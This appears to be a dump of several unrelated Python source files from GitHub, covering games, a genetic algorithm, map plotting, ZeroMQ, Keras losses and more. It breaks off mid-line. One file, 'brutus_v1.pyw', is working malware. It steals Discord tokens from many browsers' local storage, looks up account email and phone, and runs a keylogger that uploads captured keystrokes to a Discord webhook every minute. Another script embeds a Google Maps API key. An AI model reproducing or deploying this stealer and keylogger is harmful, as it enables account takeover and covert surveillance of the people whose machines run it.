user_choice):\n # 判断游戏结果\n if computer == user_choice:\n return \"tie(平)\"\n elif (computer, user_choice) in win_cases:\n return \"win(赢)\"\n else:\n return \"lose(输)\"\n\n# 等待用户输入选项的函数\n\n\ndef get_user_choice():\n # 等待用户输入选项\n options_prompt = \"、\".join(\n [f\"{index+1}:({desc}|{name})\" for index, (name, desc) in options_enumerate])\n user_choice_index = int(input(f\"请选择{options_prompt}:\"))\n # 获取用户选择的选项\n user_choice = options_keys[user_choice_index-1]\n print(\"好的,您的选择是:\", user_choice)\n return user_choice\n\n# 定义游戏函数\n\n\ndef play_game():\n user_choice = get_user_choice()\n computer = computer_choice()\n # 检查游戏结果并打印输出\n result = check_result(computer, user_choice)\n print(result)\n\n\n# 无限循环,直到用户选择退出\nwhile True:\n play_game()\n play_again = input(\"再玩一次?(y/n)\")\n if play_again.lower() != 'y':\n break\n","repo_name":"osins/osins-learning-python","sub_path":"code/rock-paper-scissors-game/src/simple/play_game5.py","file_name":"play_game5.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20873368949","text":"from CrackBox import Black_Box_Function\nimport numpy as np\n\nclass GA:\n def __init__(self, chromosome_size=16, population=200, cross_prob=0.9, muta_prob=0.3):\n self.crack = Black_Box_Function(\"input2.txt\", \"output2.txt\", \"2-6.exe\")\n self.chromosome_size = chromosome_size\n self.population = population\n self.cross_prob = cross_prob\n self.muta_prob = muta_prob\n\n def create_generation(self):\n chromosome = np.random.randint(high=2, low=0, size=self.chromosome_size)\n all_solution = np.empty((0, len(chromosome)))\n\n for i in range(self.population):\n np.random.shuffle(chromosome)\n all_solution = np.vstack((all_solution, chromosome))\n\n return all_solution\n\n #Function from black box\n def f(self, decode_x1, decode_x2):\n return self.crack.getFunction(decode_x1, decode_x2)\n\n #Objective Function\n def getObjective(self, chromosome):\n lb_x = -2\n ub_x = 2\n len_x = len(chromosome)//2\n precision_x = (ub_x - lb_x)/(2**len_x - 1)\n\n z = 0\n t = 1\n x_bit = 0\n x1_bit_sum = 0\n\n for i in range(len(chromosome)//2):\n x_bit = chromosome[-t]*(2**z)\n x1_bit_sum += x_bit\n z += 1\n t += 1\n \n z = 0\n t = 1 + len(chromosome)//2\n x_bit = 0\n x2_bit_sum = 0\n\n for i in range(len(chromosome)//2):\n x_bit = chromosome[-t]*(2**z)\n x2_bit_sum += x_bit\n z += 1\n t += 1\n\n decode_x1 = (x1_bit_sum) * precision_x + lb_x\n decode_x2 = (x2_bit_sum) * precision_x + lb_x\n\n return (decode_x1, decode_x2, self.f(decode_x1, decode_x2))\n\n #Tournament selection\n def find_parents_ts(self, all_solution):\n parents = np.empty((0, np.size(all_solution, 1)))\n\n for i in range(2):\n indices_list = np.random.choice(len(all_solution), 3, replace=False)\n\n posb_parent_1 = all_solution[indices_list[0]]\n posb_parent_2 = all_solution[indices_list[1]]\n posb_parent_3 = all_solution[indices_list[2]]\n\n obj_func_parent_1 = self.getObjective(posb_parent_1)[2]\n obj_func_parent_2 = self.getObjective(posb_parent_2)[2]\n obj_func_parent_3 = self.getObjective(posb_parent_3)[2]\n\n min_obj_func = min(obj_func_parent_1, obj_func_parent_2, obj_func_parent_3)\n\n if min_obj_func == obj_func_parent_1:\n selected_parent = posb_parent_1\n elif min_obj_func == obj_func_parent_2:\n selected_parent = posb_parent_2\n else:\n selected_parent = posb_parent_3\n \n parents = np.vstack((parents, selected_parent))\n \n parent_1 = parents[0,:]\n parent_2 = parents[1,:]\n\n return (parent_1, parent_2)\n\n #Crossover\n def crossover(self, parent_1, parent_2):\n cross_prob=self.cross_prob\n\n chlid_1 = np.empty((0, len(parent_1)))\n chlid_2 = np.empty((0, len(parent_2)))\n\n cross_rand_prob = np.random.rand()\n\n if cross_rand_prob < cross_prob:\n\n index_1 = np.random.randint(0, len(parent_1))\n index_2 = np.random.randint(0, len(parent_2))\n\n while index_1 == index_2:\n index_2 = np.random.randint(0, len(parent_2))\n\n if index_1 > index_2:\n index_1, index_2 = index_2, index_1\n \n #Parent_1\n first_sec_par_1 = parent_1[:index_1]\n mid_sec_par_1 = parent_1[index_1:index_2+1]\n last_sec_par_1 = parent_1[index_2+1:]\n \n #Parent_2\n first_sec_par_2 = parent_2[:index_1]\n mid_sec_par_2 = parent_2[index_1:index_2+1]\n last_sec_par_2 = parent_2[index_2+1:]\n\n chlid_1 = np.concatenate((first_sec_par_1, mid_sec_par_2, last_sec_par_1))\n chlid_2 = np.concatenate((first_sec_par_2, mid_sec_par_1, last_sec_par_2))\n\n else:\n chlid_1 = parent_1\n chlid_2 = parent_2\n\n return (chlid_1, chlid_2)\n\n def mutation(self, chlid_1, chlid_2):\n muta_prob=self.muta_prob\n\n #Chlid_1\n mutated_chlid_1 = np.empty((0, len(chlid_1)))\n\n t = 0\n for i in chlid_1:\n muta_rand_prob = np.random.rand()\n\n if muta_rand_prob < muta_prob:\n\n if chlid_1[t] == 0:\n chlid_1[t] = 1\n else:\n chlid_1[t] = 0\n\n mutated_chlid_1 = chlid_1\n t += 1\n\n else:\n mutated_chlid_1 = chlid_1\n t += 1\n\n #Chlid_2\n mutated_chlid_2 = np.empty((0, len(chlid_2)))\n\n t = 0\n for i in chlid_2:\n muta_rand_prob = np.random.rand()\n\n if muta_rand_prob < muta_prob:\n\n if chlid_2[t] == 0:\n chlid_2[t] = 1\n else:\n chlid_2[t] = 0\n\n mutated_chlid_2 = chlid_2\n t += 1\n \n else:\n mutated_chlid_2 = chlid_2\n t += 1\n\n return (mutated_chlid_1, mutated_chlid_2)","repo_name":"Rayato159/g6-optimization-project","sub_path":"src/Genetic_Algorithm.py","file_name":"Genetic_Algorithm.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74646995431","text":"#-*- coding: utf-8 -*-\r\n#windows: chcp 65001を実行\r\nimport sys\r\nimport io\r\nimport csv\r\nimport codecs\r\nimport math\r\nfrom pyproj import Geod\r\nimport urllib.request\r\nimport os.path\r\n\r\n# マップ出力\r\ndef download(url):\r\n\timg = urllib.request.urlopen(url)\r\n\tlocalfile = open( './app/assets/images/staticmap.png', 'wb')\r\n\tlocalfile.write(img.read())\r\n\timg.close()\r\n\tlocalfile.close()\r\n\r\nsys.stdin = io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')\r\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')\r\nsys.stderr = io.TextIOWrapper(sys.stderr.buffer, encoding='utf-8')\r\n\r\n# pathを取得\r\nlocation = []\r\nwith open('./data/gps.csv', newline='', encoding='utf-8') as f:\r\n reader = csv.reader(f, delimiter=',', quotechar='|')\r\n for i, row in enumerate(reader):\r\n location.append(row)\r\n\r\n# print(location[1][0], location[1][1])\r\n\r\n# get shelterlist\r\nshelterlist = []\r\nwith open('./data/shelterlist.csv', newline='', encoding='utf-8') as f:\r\n reader = csv.reader(f, delimiter=',', quotechar='|')\r\n for i, row in enumerate(reader):\r\n shelterlist.append(row)\r\n\r\n# print(shelterlist[1][3], shelterlist[1][4])\r\n\r\n# 近傍のshelter計算\r\ndistance = []\r\np1_latitude = location[1][0]\r\np1_longitude = location[1][1]\r\nobj_latitude = 0.0\r\nobj_longitude = 0.0\r\nobj_altitude = 0 # 単位は(m)\r\nfor i, row in enumerate(shelterlist):\r\n if i != 0:\r\n obj_latitude = row[3]\r\n obj_longitude = row[4]\r\n obj_altitude = 0 # 単位は(m)\r\n g = Geod(ellps='WGS84')\r\n azimuth, back_azimuth, distance_2d = g.inv(p1_longitude, p1_latitude, obj_longitude, obj_latitude)\r\n result = g.inv(p1_longitude, p1_latitude, obj_longitude, obj_latitude)\r\n # print (result)\r\n azimuth = result[0]\r\n back_azimuth = result[1]\r\n distance_2d = result[2]\r\n distance.append(distance_2d)\r\n\r\nmindist = float(\"inf\")\r\nfor i, dist in enumerate(distance):\r\n # print(dist)\r\n if mindist > dist:\r\n mindist = dist\r\n minindex = i\r\n\r\n# print(minindex, distance[minindex])\r\n# print(shelterlist[minindex+1])\r\n\r\n# p1_latitude\r\n# p1_longitude\r\nobj_latitude = shelterlist[minindex+1][3]\r\nobj_longitude = shelterlist[minindex+1][4]\r\n# print (p1_latitude, p1_longitude, obj_latitude, obj_longitude)\r\n\r\n# 地図と自己位置マーカー\r\n# url = \"https://maps.googleapis.com/maps/api/staticmap?center=34.687315,135.526201&size=640x480&sensor=false&zoom=14&markers=34.687315,135.526201&key=AIzaSyB62o5omyv9vrVo8Lwfm-Iq6FsNIMyfQ7I\"\r\n\r\n# 地図と自己位置マーカー青+避難所マーカー赤\r\n#url = \"https://maps.googleapis.com/maps/api/staticmap?center=34.687315,135.526201&size=640x480&sensor=false&zoom=14&markers=color%3Ablue%7Csize%3Anormal%7C34.687315%2C135.526201&markers=%7C34.688450%2C135.527450&path=color%3Ablue%7Cweight%3A12%7C34.687315%2C135.526201%7C34.688450%2C135.527450&key=AIzaSyB62o5omyv9vrVo8Lwfm-Iq6FsNIMyfQ7I\"\r\n# pathあり\r\n# url = \"https://maps.googleapis.com/maps/api/staticmap?center=\" + str(p1_latitude) + \",\" + str(p1_longitude) \\\r\n# + \"&size=640x480&sensor=false&zoom=14&markers=color:blue|size:normal|\" + str(p1_latitude) + \",\" + str(p1_longitude) \\\r\n# + \"&markers=\" + str(obj_latitude) + \",\" + str(obj_longitude) \\\r\n# + \"&path=color:blue|weight:12|\" + str(p1_latitude) + \",\" + str(p1_longitude) \\\r\n# + \"|\" + str(obj_latitude) + \",\" + str(obj_longitude) \\\r\n# + \"&key=AIzaSyB62o5omyv9vrVo8Lwfm-Iq6FsNIMyfQ7I\"\r\n\r\n# pathなし\r\nurl = \"https://maps.googleapis.com/maps/api/staticmap?center=\" + str(p1_latitude) + \",\" + str(p1_longitude) \\\r\n + \"&size=640x480&sensor=false&zoom=14&markers=color:blue|size:normal|\" + str(p1_latitude) + \",\" + str(p1_longitude) \\\r\n + \"&markers=\" + str(obj_latitude) + \",\" + str(obj_longitude) \\\r\n + \"&key=AIzaSyB62o5omyv9vrVo8Lwfm-Iq6FsNIMyfQ7I\"\r\n# print (url)\r\ndownload(url)\r\n\r\n# 特定のshelterのsupplieslist_no.を取得\r\n# ファイル名を返す\r\nwith open('./data/nearestshelter.txt' , 'w', newline='', encoding='utf-8') as f:\r\n f.write('supplieslist_' + str(minindex+1) + '.csv,'+str(minindex+1))\r\n","repo_name":"jphacks/KS_1608","sub_path":"workspace/scripts/getgps.py","file_name":"getgps.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3433229988","text":"# www.github.com/Fontesie #\r\n\r\n\r\n\r\nfrom multiprocessing.connection import wait\r\nfrom re import findall\r\nimport keyboard\r\nfrom threading import Timer\r\nfrom datetime import datetime\r\nimport requests\r\nimport os\r\nimport time\r\nfrom random import randint\r\nimport json\r\nfrom urllib.request import Request, urlopen\r\nimport socket\r\nimport re\r\n\r\n\r\nwebhooklink = \"\" # Your Webhook\r\nSEND_REPORT_EVERY = 60 # Choose the time ( 60s = 1min )\r\n\r\n\r\n\r\n\r\n\r\n\r\nlappdata = os.getenv('LOCALAPPDATA')\r\noutput = lappdata+'/Temp/brutus' + str(randint(0, 100)) + '.tmp' \r\ncomputername = os.environ['COMPUTERNAME']\r\nwith open(output, 'w') as f:\r\n f.close()\r\n\r\ndef retrieve_user(token):\r\n return json.loads(requests.get(\"https://discord.com/api/v9/users/@me\", headers={\"Authorization\": token, \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\", \"Content-Type\": \"application/json\"}).text)\r\n\r\n\r\n\r\ndata = {\r\n \"avatar_url\": \"https://cdn.discordapp.com/avatars/854037287716651108/08948e1e8f48c0b056e525790f541168.png\", \r\n \"content\" : \"\",\r\n \"username\" : \"Brutus\"\r\n }\r\ndata[\"embeds\"] = [\r\n {\r\n \"description\" : f\"**Session started** ✅\\n **Session name:** {computername}\",\r\n \"title\" : \"Brutus\",\r\n \"footer\": {\r\n \"text\": \"Fontesie#2621 • github.com/Fontesie\"\r\n }\r\n }\r\n ]\r\n\r\nresult = requests.post(webhooklink, json = data)\r\n\r\nclass Brutus:\r\n\r\n def __init__(self):\r\n if os.name != 'nt':\r\n exit()\r\n\r\n self.tokens = []\r\n self.pc_roaming = os.getenv('APPDATA')\r\n self.pc_local = os.getenv('LOCALAPPDATA')\r\n\r\n self.scrape_tokens()\r\n\r\n for token in self.tokens:\r\n\r\n raw_user_data = retrieve_user(token)\r\n user_json_str = json.dumps(raw_user_data)\r\n user = json.loads(user_json_str)\r\n if \"username\" in user:\r\n\r\n if webhooklink:\r\n webhook_data = {\"username\": \"Brutus\", \"embeds\": [\r\n dict(title=\"Brutus\",\r\n\r\n fields=[\r\n {\r\n \"name\": \":computer: Account Information\",\r\n \"value\": f' User ID: {user[\"id\"]}\\n Username: {user[\"username\"] + \"#\" + user[\"discriminator\"]}\\n Email: {user[\"email\"]}\\n Phone: {user[\"phone\"]}',\r\n\r\n \"inline\": True\r\n \r\n },\r\n\r\n {\r\n \"name\": f\":computer: Token:\",\r\n \"value\": f\"{token}\",\r\n \"inline\": True\r\n },\r\n\r\n ]),\r\n ]}\r\n\r\n data = {\r\n \"avatar_url\": \"https://cdn.discordapp.com/avatars/854037287716651108/08948e1e8f48c0b056e525790f541168.png\", \r\n \"content\" : \"\",\r\n \"username\" : \"Brutus\"\r\n }\r\n data[\"embeds\"] = [\r\n {\r\n \"description\" : f\"**Session started on** ✅\\n **Session name:** {computername}\",\r\n \"title\" : \"Brutus\",\r\n \"footer\": {\r\n \"text\": \"Fontesie#2621 • github.com/Fontesie\"\r\n }\r\n }\r\n ]\r\n result = requests.post(webhooklink, headers={\"Content-Type\": \"application/json\"}, data=json.dumps(webhook_data))\r\n\r\n\r\n self.tokens.remove(token)\r\n\r\n def scrape_tokens(self):\r\n\r\n crawl = {\r\n 'Discord': self.pc_roaming + r'\\\\discord\\\\Local Storage\\\\leveldb\\\\',\r\n 'Discord Canary': self.pc_roaming + r'\\\\discordcanary\\\\Local Storage\\\\leveldb\\\\',\r\n 'Lightcord': self.pc_roaming + r'\\\\Lightcord\\\\Local Storage\\\\leveldb\\\\',\r\n 'Discord PTB': self.pc_roaming + r'\\\\discordptb\\\\Local Storage\\\\leveldb\\\\',\r\n 'Opera': self.pc_roaming + r'\\\\Opera Software\\\\Opera Stable\\\\Local Storage\\\\leveldb\\\\',\r\n 'Opera GX': self.pc_roaming + r'\\\\Opera Software\\\\Opera GX Stable\\\\Local Storage\\\\leveldb\\\\',\r\n 'Amigo': self.pc_local + r'\\\\Amigo\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Torch': self.pc_local + r'\\\\Torch\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Kometa': self.pc_local + r'\\\\Kometa\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Orbitum': self.pc_local + r'\\\\Orbitum\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'CentBrowser': self.pc_local + r'\\\\CentBrowser\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n '7Star': self.pc_local + r'\\\\7Star\\\\7Star\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Sputnik': self.pc_local + r'\\\\Sputnik\\\\Sputnik\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Vivaldi': self.pc_local + r'\\\\Vivaldi\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\',\r\n 'Chrome SxS': self.pc_local + r'\\\\Google\\\\Chrome SxS\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Chrome': self.pc_local + r'\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\',\r\n 'Epic Privacy Browser': self.pc_local + r'\\\\Epic Privacy Browser\\\\User Data\\\\Local Storage\\\\leveldb\\\\',\r\n 'Microsoft Edge': self.pc_local + r'\\\\Microsoft\\\\Edge\\\\User Data\\\\Defaul\\\\Local Storage\\\\leveldb\\\\',\r\n 'Uran': self.pc_local + r'\\\\uCozMedia\\\\Uran\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\',\r\n 'Yandex': self.pc_local + r'\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\',\r\n 'Brave': self.pc_local + r'\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\',\r\n 'Iridium': self.pc_local + r'\\\\Iridium\\\\User Data\\\\Default\\\\Local Storage\\\\leveldb\\\\'\r\n }\r\n\r\n for source, path in crawl.items():\r\n if not os.path.exists(path):\r\n continue\r\n for file_name in os.listdir(path):\r\n if not file_name.endswith('.log') and not file_name.endswith('.ldb'):\r\n continue\r\n for line in [x.strip() for x in open(f'{path}\\\\{file_name}', errors='ignore').readlines() if x.strip()]:\r\n for regex in (r'[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}', r'mfa\\.[\\w-]{84}'):\r\n for token in re.findall(regex, line):\r\n self.tokens.append(token)\r\n\r\n\r\ninit = Brutus()\r\n\r\n\r\nclass Keylogger:\r\n def __init__(self, interval, report_method=\"\"):\r\n\r\n self.interval = interval\r\n self.report_method = report_method\r\n self.log = \"\"\r\n\r\n \r\n def callback(self, event):\r\n\r\n name = event.name\r\n if len(name) > 1:\r\n\r\n if name == \"space\":\r\n name = \" \"\r\n elif name == \"enter\":\r\n\r\n name = \"[ENTER]\\n\"\r\n elif name == \"decimal\":\r\n name = \".\"\r\n else:\r\n name = name.replace(\" \", \"_\")\r\n name = f\"[{name.upper()}]\"\r\n if name == \"[ALT]\":\r\n name = \" [ALT] \"\r\n if name == \"[TAB]\":\r\n name = \" [TAB] \"\r\n\r\n\r\n \r\n self.log += name\r\n\r\n\r\n def update_filename(self):\r\n\r\n start_dt_str = str(self.start_dt)[:-7].replace(\" \", \"-\").replace(\":\", \"\")\r\n end_dt_str = str(self.end_dt)[:-7].replace(\" \", \"-\").replace(\":\", \"\")\r\n self.filename = f\"{output}\"\r\n\r\n def report_to_file(self):\r\n\r\n with open(f\"{self.filename}\", \"w\") as f:\r\n print(self.log, file=f)\r\n \r\n\r\n def report(self):\r\n f = open(output, \"r\")\r\n if self.log:\r\n self.end_dt = datetime.now()\r\n self.update_filename()\r\n if self.report_method == \"file\":\r\n self.report_to_file()\r\n\r\n self.start_dt = datetime.now()\r\n self.log = \"\"\r\n data = {\r\n \"avatar_url\": \"https://cdn.discordapp.com/avatars/854037287716651108/08948e1e8f48c0b056e525790f541168.png\", \r\n \"content\" : \"\",\r\n \"username\" : \"Brutus\"\r\n }\r\n data[\"embeds\"] = [\r\n {\r\n \"description\" : \"File uploaded.\",\r\n \"title\" : \"Brutus\",\r\n \"footer\": {\r\n \"text\": \"Fontesie#2621 • github.com/Fontesie\"\r\n }\r\n }\r\n ]\r\n \r\n result = requests.post(webhooklink, json = data)\r\n result = requests.post(webhooklink, files={'upload_file': open(output,'rb')})\r\n timer = Timer(interval=self.interval, function=self.report)\r\n timer.daemon = True\r\n timer.start()\r\n\r\n def start(self):\r\n self.start_dt = datetime.now()\r\n keyboard.on_release(callback=self.callback)\r\n self.report()\r\n keyboard.wait()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method=\"file\")\r\n keylogger.start()","repo_name":"Fontesie/Brutus","sub_path":"brutus_v1.pyw","file_name":"brutus_v1.pyw","file_ext":"pyw","file_size_in_byte":9263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"13694525503","text":"# %%\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n# use to turn axis into percentage\nfrom matplotlib.ticker import PercentFormatter\nsns.set()\n\n# %%\ndf = pd.read_csv(r'/Users/lindazhong/Documents/Data_science_365/Data Visualization/bar_line_chart_data.csv')\ndf\n\n# %%\nsns.set_style('white')\n# note : it's subplots not subplot\n# ax : y-axis and x-axis\nfig, ax = plt.subplots(figsize = (10, 7), dpi=500)\nax.bar(df.Year, df.Participants, color = 'k')\nax.set_ylabel('Number of Participants', fontweight = 'bold')\nax.tick_params(axis = 'y')\n# use the same x-axis\nax1 = ax.twinx()\n\n# setting the percentage ticker\nax1.set_ylim(0,1)\nax1.yaxis.set_major_formatter(PercentFormatter(xmax = 1.0))\n###########\n\nax1.plot(df.Year, df[\"Python Users\"], color = \"#b60000\", marker = \"D\")\nax1.set_ylabel('Python User in %', fontweight = 'bold')\nax.set_title('KD Nuggets Survey Python Users (2012-2019)', fontsize = 14, fontweight = 'bold');\n","repo_name":"Liam-Lin0107/DataScience365_Course","sub_path":"Templete/Pareto_chart.py","file_name":"Pareto_chart.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71184157034","text":"\"\"\"\nFearful: Attempt to maximize the distance between us and other snakes(' heads)\n\"\"\"\nfrom typing import List\n\nfrom libsnek.movement import surroundings, find_path\nfrom libsnek.math import normalize_max, rms\nimport numpy as np\n\n\ndef distance_to_snake(board_state, pos, snake):\n path = find_path(board_state, pos, snake.head)\n if path is None:\n # A rough \"max\" distance\n return board_state.width + board_state.height\n\n return len(path)\n\n\ndef snake_distance_rms(board_state, pos):\n d = np.array([\n float(distance_to_snake(board_state, pos, s))\n for s in board_state.other_snakes\n ])\n return rms(d)\n\n\nasync def apply(board_state) -> List[float]:\n my_pos = board_state.you.body[0]\n\n distances = [\n snake_distance_rms(board_state, p)\n for p in surroundings(my_pos)\n ]\n\n return normalize_max(distances)\n\n","repo_name":"adambard/kobra-khan","sub_path":"kobrakhan/heuristics/fearful.py","file_name":"fearful.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74553464231","text":"\nimport argparse\nimport time\n\nfrom random import randint\nfrom typing import Any, Optional, Callable, Dict, cast\n\nimport zmq\nfrom zmq.utils.monitor import recv_monitor_message\n\n\nEVENTS_MAP = {}\n\nEVENT_NAMES = [x for x in dir(zmq) if 'EVENT_' in x]\n\nfor ev_name in EVENT_NAMES:\n EVENTS_MAP[getattr(zmq, ev_name)] = ev_name\n\n\ndef tprint(*args: Any, **kwargs: Any) -> None:\n kwargs.update({'flush': True}, **kwargs)\n when = time.strftime(\"%H:%M:%S\")\n print(when, *args, **kwargs)\n\n\ndef fetch_event(\n monitor: zmq.Socket,\n poller: zmq.Poller\n) -> Optional[Dict[str, Any]]:\n\n polled = dict(poller.poll(0))\n\n if monitor in polled:\n return cast(\n Callable[[zmq.Socket], Dict[str, Any]],\n recv_monitor_message\n )(monitor)\n\n return None\n\n\ndef main(socket_type: int) -> None:\n UID = randint(1000, 10_000)\n tprint(f\"CONNECTER [{UID}] START\")\n\n ctx = zmq.Context() # type: ignore\n binder = ctx.socket(socket_type) # type: ignore\n\n monitor = binder.get_monitor_socket()\n\n poller = zmq.Poller() # type: ignore\n poller.register(monitor)\n\n try:\n binder.connect(\"tcp://127.0.0.1:7777\")\n\n while True:\n poller.poll()\n\n event = fetch_event(monitor, poller)\n\n if event is not None:\n e_code = event['event']\n print()\n tprint('-' * 20)\n tprint(\"EVENT_CODE :\", e_code, EVENTS_MAP[e_code])\n tprint(\"EVENT_VALUE :\", event['value'])\n tprint(\"EVENT_ENDPOINT:\", event['endpoint'])\n\n except KeyboardInterrupt:\n tprint(\"\\nCtrl+C detected\")\n\n tprint(\"Closing socket ...\")\n binder.disable_monitor()\n monitor.close(1)\n binder.close(1)\n\n tprint(\"Closing context ...\")\n ctx.term() # type: ignore\n\n tprint(f\"CONNECTER [{UID}] STOP\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-s',\n dest='socket_type',\n type=str,\n choices=zmq.utils.constant_names.socket_type_names,\n default='REP',\n )\n\n args = parser.parse_args()\n\n socket_type: int = getattr(zmq, args.socket_type)\n\n main(socket_type)\n","repo_name":"AndreiHondrari/techonologies-exploration","sub_path":"general-distributed-systems/zeromq/s30_unpredictable_state_on_wrong_conn/connecter.py","file_name":"connecter.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25605780942","text":"import firebase_admin\nfrom firebase_admin import credentials\nimport sys\nsys.path.insert(1, '../')\nfrom config import *\n\nclass DbConnection:\n def __init__(self):\n if not firebase_admin._apps:\n cred = credentials.Certificate(\"serviceAccountKey.json\")\n firebase_admin.initialize_app(cred, {\n \"databaseURL\" : DATABASE_URL,\n 'storageBucket': STORAGE_URL\n })\n print(\"CODE_LOG: Database is connected.\")","repo_name":"huynhmytuan/yang-bot","sub_path":"db/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34885008666","text":"def add(a,b):\n print(\"addition using simple function = \",a+b)\nadd(2,8)\n\nadd=lambda a,b : a+b\nprint(\"addition using lambda function = \" ,add(2,8))\n\n# Lambda functions or anonymous functions\n# def add(a, b):\n# return a+b\n#\n# # minus = lambda x, y: x-y\n#\n# def minus(x, y):\n# return x-y\n#\n# print(minus(9, 4))\n\n\na = [[1, 14], [5, 6], [8, 23]]\na.sort(key=lambda x: x[1])\nprint(a)\n\n","repo_name":"Rajatsharma2002/Basic_Python_Program","sub_path":"lambda_func.py","file_name":"lambda_func.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12499086908","text":"import json\n\nclass TrackPart:\n def __init__(self, start_name, end_name, line_number, line_name, km_start, km_end, coordinates):\n self.start_name = start_name\n self.end_name = end_name\n self.line_number = line_number\n self.line_name = line_name\n self.km_start = km_start\n self.km_end = km_end\n self.coordinates = coordinates\n\ndef create_shapes_file(path):\n f = open(path)\n data = json.load(f)\n track_parts = []\n for entry in data:\n entry = entry[\"fields\"]\n track_parts.append(TrackPart(start_name=entry[\"bp_anf_bez\"], end_name=entry[\"bp_end_bez\"], line_number=entry[\"linienr\"], line_name=entry[\"liniename\"], km_start=entry[\"km_agm_von\"], km_end=entry[\"km_agm_bis\"], coordinates=entry[\"geo_shape\"][\"coordinates\"]))\n \n print(len(track_parts))\n lines = []\n for e in track_parts:\n lines.append(e.line_number)\n lines = list(dict.fromkeys(lines))\n\n for line in lines:\n relevant_track_parts = [x for x in track_parts if x.line_number == line]\n for y in relevant_track_parts:\n print(y.start_name + \", \")\n print(\"\\n\\n\")\n\n\n","repo_name":"Shazral/public_transit_visualisation","sub_path":"create_shapes.py","file_name":"create_shapes.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7425060863","text":"from tensorflow.keras.callbacks import Callback\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\nimport glob\nfrom PIL import Image\nimport numpy as np\nimport random\nimport wandb\nfrom skimage.transform import resize\nfrom skimage import feature\n\nfrom canny_edge_detector import rgb2gray\nimport canny_edge_detector as ced\n\nfrom tensorflow.keras.applications.vgg16 import VGG16\nfrom tensorflow.keras.applications.vgg16 import preprocess_input\n\ndef perceptual_distance(y_true, y_pred):\n \"\"\"Calculate perceptual distance, DO NOT ALTER\"\"\"\n norm0 = True\n if norm0:\n y_true *= 255.0\n y_pred *= 255.0\n else:\n y_true += 1.0\n y_pred += 1.0\n y_true *= 127.5\n y_pred *= 127.5\n rmean = (y_true[:, :, :, 0] + y_pred[:, :, :, 0]) / 2\n r = y_true[:, :, :, 0] - y_pred[:, :, :, 0]\n g = y_true[:, :, :, 1] - y_pred[:, :, :, 1]\n b = y_true[:, :, :, 2] - y_pred[:, :, :, 2]\n\n return K.mean(K.sqrt((((512+rmean)*r*r)/256) + 4*g*g + (((767-rmean)*b*b)/256)))\n\ndef perceptual_distance_np(y_true, y_pred):\n \"\"\"Calculate perceptual distance, DO NOT ALTER\"\"\"\n y_true *= 255.0\n y_pred *= 255.0\n rmean = (y_true[:, :, :, 0] + y_pred[:, :, :, 0]) / 2\n r = y_true[:, :, :, 0] - y_pred[:, :, :, 0]\n g = y_true[:, :, :, 1] - y_pred[:, :, :, 1]\n b = y_true[:, :, :, 2] - y_pred[:, :, :, 2]\n\n return np.mean(np.sqrt((((512+rmean)*r*r)/256) + 4*g*g + (((767-rmean)*b*b)/256)))\n\nvgg = VGG16(include_top=False, weights='imagenet', input_shape=(256, 256, 3))\ndef custom_loss(y_true, y_pred):\n perceptual_loss = perceptual_distance(y_true, y_pred)\n\n y_true = preprocess_input(denormalize(y_true, True))\n y_pred = preprocess_input(denormalize(y_pred, True))\n #\n y_true = vgg(y_true)\n y_pred = vgg(y_pred)\n vgg_loss = K.mean(K.square(y_pred - y_true))\n\n return perceptual_loss + 1.0/5.0 * vgg_loss\n\n\n# _phase_shift and PS from https://github.com/tetrachrome/subpixel/blob/master/subpixel.py\ndef _phase_shift(I, r):\n # Helper function with main phase shift operation\n bsize, a, b, c = I.get_shape().as_list()\n X = tf.reshape(I, [-1, 